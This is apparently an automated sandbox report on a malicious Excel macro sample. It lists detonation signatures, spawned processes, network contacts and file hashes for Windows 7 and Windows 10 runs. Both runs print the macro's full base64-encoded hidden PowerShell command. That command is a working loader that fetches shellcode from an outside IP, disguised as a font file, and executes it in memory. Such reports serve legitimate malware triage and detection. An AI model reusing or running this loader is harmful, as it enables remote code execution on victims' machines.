Malware Analysis Report

2024-12-07 15:16

Sample ID 241113-1vgszazgpm
Target 5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f
SHA256 5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f
Tags
macro macro_on_action discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f

Threat Level: Known bad

The file 5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action discovery execution

Process spawned unexpected child process

Office macro that triggers on suspicious action

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 21:58

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 21:58

Reported

2024-11-13 21:59

Platform

win7-20241023-en

Max time kernel

16s

Max time network

17s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2988 wrote to memory of 2504 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2988 wrote to memory of 2504 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2988 wrote to memory of 2504 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2988 wrote to memory of 2504 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2504 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2504 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2504 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2504 wrote to memory of 3004 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 3004 wrote to memory of 2452 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3004 wrote to memory of 2452 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3004 wrote to memory of 2452 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3004 wrote to memory of 2452 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp"

Network

Country Destination Domain Proto
CH 194.182.164.149:8080 tcp

Files

memory/2988-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2988-1-0x000000007202D000-0x0000000072038000-memory.dmp

memory/2988-2-0x0000000000200000-0x0000000000300000-memory.dmp

memory/2988-3-0x0000000000200000-0x0000000000300000-memory.dmp

memory/2988-8-0x0000000000200000-0x0000000000300000-memory.dmp

memory/2988-9-0x0000000000200000-0x0000000000300000-memory.dmp

memory/2988-7-0x0000000000200000-0x0000000000300000-memory.dmp

memory/2988-6-0x0000000000200000-0x0000000000300000-memory.dmp

memory/2988-4-0x0000000000200000-0x0000000000300000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline

MD5 cc13bf030191cde69868e4b27e748256
SHA1 7a985d84475dabb80d02aac739d3b24124e1d20c
SHA256 bb060f760a5b9ec469bb5f563ab0944aa837dae50f535a082465130d8da889ab
SHA512 ff24139b79333a0ec3f99c72074c69cee411133f3964431620280a7df60a4ad7e5104cfd94a0f16c3975e1ef246a4ce9e5ae7d82cf51dcf389ae6b9b837fbd12

\??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp

MD5 dc9eb10b07859e23d805cc32941918e7
SHA1 757fb1eb624141296c5c69383e573d6b886e5eb6
SHA256 792dd3954357714c0f76dcfdf5a82e73e74478716d9a44ec96a9c5295447675b
SHA512 1be67799830ed882664a33741f9d6ef1f821a0169741fd97b3d22341f181de696d803a05536de8746f8c82d96d12e8931df27a7ed8f66a754be5808a7be1d7ae

C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp

MD5 96d3563fa093dde2099b93fb6f3c6053
SHA1 0053ec01c09a73af92c1d1c03e44a3ca674cc5e4
SHA256 6ef59f115a4c4f3c25ffe171be2b86371e6084fdee179ccd4cb1bc29caf966a4
SHA512 eb8052443bd3e88bf5758a0cddf9134568313fa6aaed150e0e26fe4bf2bf9a25d72198e353b4a6a81e7d836d9dfa41c40398b03225c11615f267acc6dcb9961a

C:\Users\Admin\AppData\Local\Temp\ztdg0y54.dll

MD5 ded5c1d028402a58f25356d5965eb33e
SHA1 2cc7c6327e2f806c33e71ac97bbc47815302f105
SHA256 252bd54f2c4f254693a739af65427f62c3f4d8b59514613c332848fb7b836ecf
SHA512 6073aa86fc95cdeeaf59ec176c1489e90716b28d5ea4a0c43ee3a752a517886774b03871ec6f02eb4de46bcc9bd3254b7794ae35e2bafb67285aec4b1736b8f2

C:\Users\Admin\AppData\Local\Temp\ztdg0y54.pdb

MD5 8086a47d28b8c125c8392c53f127ea57
SHA1 228a87d4f7f611ff1c147911c08b736f4ffd2490
SHA256 aca9e9e7902195692dc83d27dff689bb400e90c3ac9a1f286956bbf75b1407b6
SHA512 a3e316420fe3f743a88dc253bd11525cb00559dd025b4c0be44541e68c4ac049eb1e8c15edbe90aefc273a8db3025e83bbd54b940fee772577032322218304a5

memory/2988-27-0x000000007202D000-0x0000000072038000-memory.dmp

memory/2988-28-0x0000000000200000-0x0000000000300000-memory.dmp

memory/2988-29-0x0000000000200000-0x0000000000300000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 21:58

Reported

2024-11-13 21:59

Platform

win10v2004-20241007-en

Max time kernel

36s

Max time network

37s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87ED.tmp" "c:\Users\Admin\AppData\Local\Temp\4sxb5iel\CSC6226AC086F4E495C90E0385C98AC523.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
GB 52.109.28.47:443 roaming.officeapps.live.com tcp
CH 194.182.164.149:8080 tcp
US 8.8.8.8:53 47.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp

Files

memory/832-1-0x00007FFCF728D000-0x00007FFCF728E000-memory.dmp

memory/832-0-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp

memory/832-3-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp

memory/832-5-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp

memory/832-4-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp

memory/832-2-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp

memory/832-8-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-7-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-6-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-12-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-11-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-10-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-13-0x00007FFCB4910000-0x00007FFCB4920000-memory.dmp

memory/832-9-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-14-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-19-0x00007FFCB4910000-0x00007FFCB4920000-memory.dmp

memory/832-18-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-22-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-21-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-20-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-17-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-16-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-15-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-26-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/832-27-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp

memory/5036-35-0x000002C19C130000-0x000002C19C152000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lu1ik0h3.sa5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

\??\c:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.cmdline

MD5 abd0f1fd39b5de26bd9e8862a72323c9
SHA1 ac9c21f480c303e11d624c61c1bb43f19e4479af
SHA256 bcfcf13672297034438c1ff300c742f0c2979ece919998bec71be0ce3d3b688e
